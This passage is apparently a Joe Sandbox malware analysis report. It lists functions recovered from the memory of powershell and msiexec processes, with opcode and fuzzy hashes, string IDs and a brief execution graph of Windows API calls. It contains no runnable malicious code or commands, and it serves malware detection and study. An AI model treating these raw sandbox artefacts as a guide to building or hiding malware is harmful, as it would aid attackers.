                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$x.xk$-xk
                                                                              • API String ID: 0-1662749126
                                                                              • Opcode ID: c784849a989ac0f4af834c713359cd0a2fab21b988ed4ca5c9e2cf4176af4911
                                                                              • Instruction ID: 4cef1cf76c0b07a22e9906c5111d95e1ef4a69ca70af1279f7d69dfccc764fe1
                                                                              • Opcode Fuzzy Hash: c784849a989ac0f4af834c713359cd0a2fab21b988ed4ca5c9e2cf4176af4911
                                                                              • Instruction Fuzzy Hash: CE1241B4A102158FD764DB54CA50BDEBBB2FF85300F1085E4D9096B381DB76AD85CFA1
                                                                              Function 0723DD00 Relevance: 7.7, Strings: 6, Instructions: 213COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq$$jq$$jq
                                                                              • API String ID: 0-210473685
                                                                              • Opcode ID: b89eb130c5ad5d7242c1661c7257d528477e81582a1e5059ca670d3ac3de0ebb
                                                                              • Instruction ID: 344244adc71dc60f4b090d51c179bd17254b2e0d4902b3188f25b574f7027b84
                                                                              • Opcode Fuzzy Hash: b89eb130c5ad5d7242c1661c7257d528477e81582a1e5059ca670d3ac3de0ebb
                                                                              • Instruction Fuzzy Hash: 7B6106F272424EDFCB298E69D4006AABBB6EFC2311F14C5BAD8058B255DB35CD45C7A0
                                                                              Function 090126E8 Relevance: 6.6, Strings: 5, Instructions: 389COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345303997.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tPjq$tPjq$$jq$$jq$$jq
                                                                              • API String ID: 0-3881469342
                                                                              • Opcode ID: 7bae8c954618b9a7301399565c99f59ff0e3d74fc088b0b49d493b27f31ce4b6
                                                                              • Instruction ID: a18e12a74424d2c5624b0f5631936915350b9c116027684e59fa58bd08edd1b0
                                                                              • Opcode Fuzzy Hash: 7bae8c954618b9a7301399565c99f59ff0e3d74fc088b0b49d493b27f31ce4b6
                                                                              • Instruction Fuzzy Hash: C9D1D331B00209DFCB559F6CC95166BBBE6FF84310F24886AE9159B391DB31DD85CBA0
                                                                              Function 0723F5DB Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$tPjq$$jq$$jq$$jq
                                                                              • API String ID: 0-728028659
                                                                              • Opcode ID: 74f301c03ee12ec2a3cdbcc000a059b269dcd067f6a6eecd52b78936b672b604
                                                                              • Instruction ID: 99457a23a887ff71f0ca4b103a2170bbddb8f4392b02be6db56d1ca7afc39cec
                                                                              • Opcode Fuzzy Hash: 74f301c03ee12ec2a3cdbcc000a059b269dcd067f6a6eecd52b78936b672b604
                                                                              • Instruction Fuzzy Hash: 2B61F6F0E34307DFDB298E14EB447AA77B1AF45301F54806AE8156B2A1C7B5DD81CBA1
                                                                              Function 07230538 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                                              • API String ID: 0-103809679
                                                                              • Opcode ID: 4a50f017de759cb8d1abbaaefb64fe15b7e5e76b86265be8a0fdb2b7f99f68c9
                                                                              • Instruction ID: 497a48fb3e89bfec64593bf813ea490966a28e4bca82fe88608d1d0f0215b28e
                                                                              • Opcode Fuzzy Hash: 4a50f017de759cb8d1abbaaefb64fe15b7e5e76b86265be8a0fdb2b7f99f68c9
                                                                              • Instruction Fuzzy Hash: 7A4106F0B242169FCB359A3489106AF7FA7AFC2600F14446ED905CB295EB31D945CBB2
                                                                              Function 0723EA28 Relevance: 6.4, Strings: 5, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                                              • API String ID: 0-103809679
                                                                              • Opcode ID: a39e4f4a836b1869943cf47aa5f69f39b63316fa61a2fdc658f91d1d2509eab9
                                                                              • Instruction ID: 671e2088f43e64f8a34b2a74d7395d5826e0239a1defb122f6a7e2427df6f9d5
                                                                              • Opcode Fuzzy Hash: a39e4f4a836b1869943cf47aa5f69f39b63316fa61a2fdc658f91d1d2509eab9
                                                                              • Instruction Fuzzy Hash: E44128F5F20217CFCB218E69845067BBBE6FFC5210F25807AD816C7241DA35C909C7A1
                                                                              Function 0723E7EE Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$d%pq$d%pq$d%pq$tPjq
                                                                              • API String ID: 0-3681948632
                                                                              • Opcode ID: e1608875faf9ec4dd258b45b07e5f9fa09bb2ef9945d612f9f43ac21d02119ab
                                                                              • Instruction ID: f0841bf6abfb5567ca306b23e9a7e2370d7aa76fc38c406ce0d448f777786003
                                                                              • Opcode Fuzzy Hash: e1608875faf9ec4dd258b45b07e5f9fa09bb2ef9945d612f9f43ac21d02119ab
                                                                              • Instruction Fuzzy Hash: AA31BFF0F20216DFCB24DF18C540A6ABBB2FF88710F268555E805AB360C671ED05CB90
                                                                              Function 0723DFB8 Relevance: 5.5, Strings: 4, Instructions: 483COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (ojq$(ojq$(ojq$(ojq
                                                                              • API String ID: 0-3475039101
                                                                              • Opcode ID: dfa6852b343074cf4c464e84965606fc888737dc447d2493f19fadf48492c452
                                                                              • Instruction ID: 19bd0197533ad0233354c349617f626ea0d909cf3c5fce30110de45f8d20794c
                                                                              • Opcode Fuzzy Hash: dfa6852b343074cf4c464e84965606fc888737dc447d2493f19fadf48492c452
                                                                              • Instruction Fuzzy Hash: 63F16AF1B24306DFDB208F68C810B6A7BA2EFC5310F15C4AAE9158B291DB35DC49CB61
                                                                              Function 0723F9C0 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: XRoq$XRoq$tPjq$$jq
                                                                              • API String ID: 0-3567977740
                                                                              • Opcode ID: 139e068a4b817f491d9aca181ebdd157a9ba766d8ed1a53593b5bdd4baa96339
                                                                              • Instruction ID: 7481b554a68e790f7c1fc3cd795d1cbe75873b86674208d39c357bda9842738c
                                                                              • Opcode Fuzzy Hash: 139e068a4b817f491d9aca181ebdd157a9ba766d8ed1a53593b5bdd4baa96339
                                                                              • Instruction Fuzzy Hash: DE4180F1E24206DFCB24CE55E354AAAB7F3AF48710F19C0AAE8155B254C771DD44CBA0
                                                                              Function 07239B50 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $jq$$jq$$jq$$jq
                                                                              • API String ID: 0-2428501249
                                                                              • Opcode ID: 201ac533f7589c3ca60d4b4669792cdd52b09559def71f186261bb31167b94fb
                                                                              • Instruction ID: 47aa0e724fbdd8eaedac999d8e5cd1e5647aa3a0c6c3a6e72df9cd7e49ac036e
                                                                              • Opcode Fuzzy Hash: 201ac533f7589c3ca60d4b4669792cdd52b09559def71f186261bb31167b94fb
                                                                              • Instruction Fuzzy Hash: 3C215AF13303028BDB34D56A9940727A6DB9BC7618F24882AA889C7381DDB6E881C760
                                                                              Function 0723AD75 Relevance: 5.1, Strings: 4, Instructions: 80COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $jq$$jq$$jq$$jq
                                                                              • API String ID: 0-2428501249
                                                                              • Opcode ID: 307fbc4bd45f259839d38ac61e7e5ea7441088a9215447f94e822dc0be0a03ec
                                                                              • Instruction ID: 3ecfdf65e17080bd659045706d5ef0cc9955964e309b2f35625d7b4d96e98887
                                                                              • Opcode Fuzzy Hash: 307fbc4bd45f259839d38ac61e7e5ea7441088a9215447f94e822dc0be0a03ec
                                                                              • Instruction Fuzzy Hash: 5A21F1F5A3538B9FCB218E65C5002A6BBB5EF46211F58C2BBE88497242D731C985CB61
                                                                              Function 07230309 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq
                                                                              • API String ID: 0-1496060811
                                                                              • Opcode ID: a7cab2a3f3a5061fa0a0a7039481d6642603029c81451b85a2aefb53342da9d5
                                                                              • Instruction ID: 7bf9b54155e023fcdd0c732fb72d2877875614f50f91d3de133f5bfeb4db93d0
                                                                              • Opcode Fuzzy Hash: a7cab2a3f3a5061fa0a0a7039481d6642603029c81451b85a2aefb53342da9d5
                                                                              • Instruction Fuzzy Hash: 5C01DF6032E7964FC3371238196056A6FB79FC351072A41EBC451DB2A3CE288C0AC3B7

                                                                              Execution Graph

                                                                              Execution Coverage:9.6%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:25
                                                                              Total number of Limit Nodes:2
                                                                              execution_graph 18407 24b42180 18410 24b421d9 18407->18410 18408 24b4218a 18412 24b421ec 18410->18412 18411 24b42204 18411->18408 18412->18411 18413 24b42408 GetModuleHandleW 18412->18413 18414 24b42435 18413->18414 18414->18408 18415 24b46b42 18416 24b46b9a CallWindowProcW 18415->18416 18417 24b46b49 18415->18417 18416->18417 18386 24b41f9c 18387 24b41fa2 18386->18387 18390 24b434cd 18387->18390 18391 24b434d0 18390->18391 18392 24b4355a 18391->18392 18395 24b44357 18391->18395 18398 24b44360 18391->18398 18396 24b44395 18395->18396 18401 24b4186c 18395->18401 18396->18392 18399 24b4186c CreateWindowExW 18398->18399 18400 24b44395 18399->18400 18400->18392 18402 24b443b0 CreateWindowExW 18401->18402 18404 24b444d4 18402->18404 18404->18404 18405 24b49038 OleInitialize 18406 24b4909c 18405->18406

                                                                              Executed Functions

                                                                              Function 005B5362 Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 5b5362-5b5364 1 5b5366-5b53a0 0->1 2 5b53c4-5b5484 call 5b41a0 call 5b3cc0 0->2 3 5b53a2 1->3 4 5b53a7-5b53c2 1->4 14 5b548b-5b54a9 2->14 15 5b5486 2->15 3->4 4->2 45 5b54ac call 5b5658 14->45 46 5b54ac call 5b5650 14->46 47 5b54ac call 5b57c0 14->47 15->14 16 5b54b2-5b54bd 17 5b54bf 16->17 18 5b54c4-5b54c8 16->18 17->18 19 5b54ca-5b54cb 18->19 20 5b54cd-5b54d4 18->20 21 5b54ec-5b5530 19->21 22 5b54db-5b54e9 20->22 23 5b54d6 20->23 27 5b5596-5b55ad 21->27 22->21 23->22 29 5b55af-5b55d4 27->29 30 5b5532-5b5548 27->30 36 5b55ec 29->36 37 5b55d6-5b55eb 29->37 34 5b554a-5b5556 30->34 35 5b5572 30->35 38 5b5558-5b555e 34->38 39 5b5560-5b5566 34->39 40 5b5578-5b5595 35->40 37->36 41 5b5570 38->41 39->41 40->27 41->40 45->16 46->16 47->16
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0oMp$LjMp$LjMp$PHjq$PHjq
                                                                              • API String ID: 0-3395041758
                                                                              • Opcode ID: 04ccab70b6629f8a63beed124f0edc4a8b3720670c1625e134d6955e0b15bd97
                                                                              • Instruction ID: 5ac8d0e331677881857c1a78219d9ac9ad8452fc912e08aeef505e4f8ff890bb
                                                                              • Opcode Fuzzy Hash: 04ccab70b6629f8a63beed124f0edc4a8b3720670c1625e134d6955e0b15bd97
                                                                              • Instruction Fuzzy Hash: 2291C574D006188FDB18DFA9D884A9DBFF2BF88311F15C069E809AB365EB34A945CF10
                                                                              Function 24979C70 Relevance: 3.5, Strings: 1, Instructions: 2230COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: K
                                                                              • API String ID: 0-856455061
                                                                              • Opcode ID: 2b944cc9ff2e1196773a798c9d39312f2bee126c582e6a4f5955640fccfeba67
                                                                              • Instruction ID: deebb033337692d05f676e8ad3c30fdbc9ca94a11a5b5614b51b21fc87e2c3f4
                                                                              • Opcode Fuzzy Hash: 2b944cc9ff2e1196773a798c9d39312f2bee126c582e6a4f5955640fccfeba67
                                                                              • Instruction Fuzzy Hash: 5033D471C146198EDB11EF68C894ADDFBB1FF99300F50D69AE44867225EB70AAC4CF81
                                                                              Function 24979C5F Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: K
                                                                              • API String ID: 0-856455061
                                                                              • Opcode ID: e688aef343bba132d045b40d207b8ae7f554bcb2ce51d2b9e51fbf6a42e25e8d
                                                                              • Instruction ID: a4bf979bcbaf5480a092fd2e01b5c494d915e4901c1dfe4ba45eece6e79966df
                                                                              • Opcode Fuzzy Hash: e688aef343bba132d045b40d207b8ae7f554bcb2ce51d2b9e51fbf6a42e25e8d
                                                                              • Instruction Fuzzy Hash: F4B116B1D056198EDB11DF69C8847DDFBB2FF99300F10C69AE4086B265EB74AA85CF40
                                                                              Function 24970B30 Relevance: .7, Instructions: 709COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 90d2eabc2c3a6023b09f011ab88ea550b10b15bc5c0fffce673ce77ee196d741
                                                                              • Instruction ID: 832ff6b8a48d3955541751cdc204ffd1fb90d66c715079ee8ba58447c91c8551
                                                                              • Opcode Fuzzy Hash: 90d2eabc2c3a6023b09f011ab88ea550b10b15bc5c0fffce673ce77ee196d741
                                                                              • Instruction Fuzzy Hash: 6A72CFB4E012298FDB65CF69C985BDDBBB2BB49300F5485E9D808A7355E734AE81CF40
                                                                              Function 24979328 Relevance: .5, Instructions: 529COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 27fd15bf485bc742b16798f1c91530e275b5a494808de2f312155bf1fe578384
                                                                              • Instruction ID: 78efbe3c7fc5badef0c9d083891c14eafb270355840a8cd074ece41f512aab70
                                                                              • Opcode Fuzzy Hash: 27fd15bf485bc742b16798f1c91530e275b5a494808de2f312155bf1fe578384
                                                                              • Instruction Fuzzy Hash: 632227B4E01219CFDB14DFA8C984B9DBBB2FF88304F1085A9D409AB395DB359A85CF50
                                                                              Function 24972968 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0ba62d8cadf19cf51403c452f924d0b59d8dccab06116ba3baffdb5a10074899
                                                                              • Instruction ID: b6aa722534cc1341e997f39ba5e80c5ce6880c736473995e43da15f8882b7c89
                                                                              • Opcode Fuzzy Hash: 0ba62d8cadf19cf51403c452f924d0b59d8dccab06116ba3baffdb5a10074899
                                                                              • Instruction Fuzzy Hash: 25C1A178E01218CFDB14DFA5C958B9DBBB6FF88301F1081A9D809AB365DB395A85CF50
                                                                              Function 24972DB8 Relevance: .2, Instructions: 220COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 646a02b75b3477ddd9ee6090e1e7ae12009baa3feddb4e0af56ebf669fc0c5a2
                                                                              • Instruction ID: 4237d95260c3a7fadf1ab7a072d6787e3e8037ef7f5493a9370cd2e70fe316e4
                                                                              • Opcode Fuzzy Hash: 646a02b75b3477ddd9ee6090e1e7ae12009baa3feddb4e0af56ebf669fc0c5a2
                                                                              • Instruction Fuzzy Hash: 70A10674D00208CFDB14DFA9C994BDDBBB1FF88311F2092A9E509AB2A1DB749984CF54
                                                                              Function 24972DC8 Relevance: .2, Instructions: 220COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ac9490025391116d47f1b7097c380cb4f70fcf183a86d1a40855843b95fb2e9e
                                                                              • Instruction ID: 651506d63a81c6810e60e9ab80743dd3ea7ae541b063770a24d6ab4482bdbc14
                                                                              • Opcode Fuzzy Hash: ac9490025391116d47f1b7097c380cb4f70fcf183a86d1a40855843b95fb2e9e
                                                                              • Instruction Fuzzy Hash: F8A10570D00208CFDB14DFA9C958BDDBBB1FF88310F2092A9E509AB2A1DB759985CF55
                                                                              Function 24971E80 Relevance: .2, Instructions: 220COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e1b7d9414e9087cd32e855ef6de490bb4fe68f2ccefb9f1b2881f8904036b993
                                                                              • Instruction ID: dd5573551a3fa629d8eed1ebc7597c3ea82c8c02afbfc6f61df2bf6aa8c15db7
                                                                              • Opcode Fuzzy Hash: e1b7d9414e9087cd32e855ef6de490bb4fe68f2ccefb9f1b2881f8904036b993
                                                                              • Instruction Fuzzy Hash: 45A182B5E012198FEB68CF6AC944B9DBBF2BF89300F14C1E9D508AB254DB745A85CF11
                                                                              Function 249717A0 Relevance: .2, Instructions: 219COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5823c35e6ae807b15a72fb61081f219cb58856c63e7e6ef7bad8a591d944e2fe
                                                                              • Instruction ID: 5602946076de8a181b7ed9ea36bb5f47e41cc2ba7eb423cbabe96bdf449bb2ef
                                                                              • Opcode Fuzzy Hash: 5823c35e6ae807b15a72fb61081f219cb58856c63e7e6ef7bad8a591d944e2fe
                                                                              • Instruction Fuzzy Hash: 8BA192B5E012298FEB68CF6AC945B9DBBF2BF88300F14C1E9D408A7255DB745A85CF11
                                                                              Function 2497310E Relevance: .2, Instructions: 202COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 24f2949914278ad2ae5b9adc3688534954ef19444391a9d342efd402d3c3aa29
                                                                              • Instruction ID: a781aaf5543238eeae4a8e472698d3c77c6d0cc268ebbfbc3e288f2c4a4f0b49
                                                                              • Opcode Fuzzy Hash: 24f2949914278ad2ae5b9adc3688534954ef19444391a9d342efd402d3c3aa29
                                                                              • Instruction Fuzzy Hash: 359107B0E40218CFDB10DFA4C994BDCBBB1FF49310F2092A9E509AB291DB759985CF10
                                                                              Function 2497FC68 Relevance: .2, Instructions: 200COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b1b957a861074c7bec2e9bc4156490ba5f506c532452eaf919f042f23bb6adad
                                                                              • Instruction ID: e1bfa58bcbe2d99a0db615a6602b01a342c77344ea74c8581d2a3f41f1f3f712
                                                                              • Opcode Fuzzy Hash: b1b957a861074c7bec2e9bc4156490ba5f506c532452eaf919f042f23bb6adad
                                                                              • Instruction Fuzzy Hash: 8381CFB4E00218CFDB04DFA9C994B9DBBB6FF88300F608569D805AB3A9DB395945CF54
                                                                              Function 24970B20 Relevance: .2, Instructions: 169COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99b9a782ce749992338e8ecb709fe761c29b045b1e85ba24c6cf55861dbcb1b2
                                                                              • Instruction ID: d42ca785b733280ea292233c24c25e1b0f108a8beb848bdc0a5a30ff5fa62b9f
                                                                              • Opcode Fuzzy Hash: 99b9a782ce749992338e8ecb709fe761c29b045b1e85ba24c6cf55861dbcb1b2
                                                                              • Instruction Fuzzy Hash: 4E71B175E01228CFDB64CF66C9847DDBBF2BB89301F1491AAD808A7264DB349A85CF40
                                                                              Function 2497178F Relevance: .2, Instructions: 162COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: addb8111bf8c4044fac8b4573b8d3ea2e27b2bef6abc144df499c4ad2903b386
                                                                              • Instruction ID: 3c9481a94348f6a54ad14c71d6188da7943ca3773fe85d6bc1446e0baf705056
                                                                              • Opcode Fuzzy Hash: addb8111bf8c4044fac8b4573b8d3ea2e27b2bef6abc144df499c4ad2903b386
                                                                              • Instruction Fuzzy Hash: D47195B5E016198FEB68CF6AC944B9EBBF2BF88300F14C1E9D408A7254DB744A85CF50
                                                                              Function 005BE988 Relevance: .1, Instructions: 147COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 851f0ab2e6d115a9763c8669d68bf1a48cb74ddb27aeeb40658b08723bd91890
                                                                              • Instruction ID: 86c15eb1c8b4c7cc9703487806066f628bf7aa69985a4990e29f99bea6be0f7b
                                                                              • Opcode Fuzzy Hash: 851f0ab2e6d115a9763c8669d68bf1a48cb74ddb27aeeb40658b08723bd91890
                                                                              • Instruction Fuzzy Hash: 2951B674E00208DFDB18DFAAD994A9DBBB6FF88300F24C529E815AB3A5DB355845CF14
                                                                              Function 24971E70 Relevance: .1, Instructions: 107COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1d36356742e01ec5ec29eedd407e42da0ccb678c99343fc820d4a6191f7eefc0
                                                                              • Instruction ID: 11661c2a4a8a4a4b307961cc8029eddc594bd3ece519e52775cc5d2a35e5b4d4
                                                                              • Opcode Fuzzy Hash: 1d36356742e01ec5ec29eedd407e42da0ccb678c99343fc820d4a6191f7eefc0
                                                                              • Instruction Fuzzy Hash: F84158B1E016188BEB58CF5BC94479EFAF7AFC9300F14C5A9D50CA7264EB740A858F51
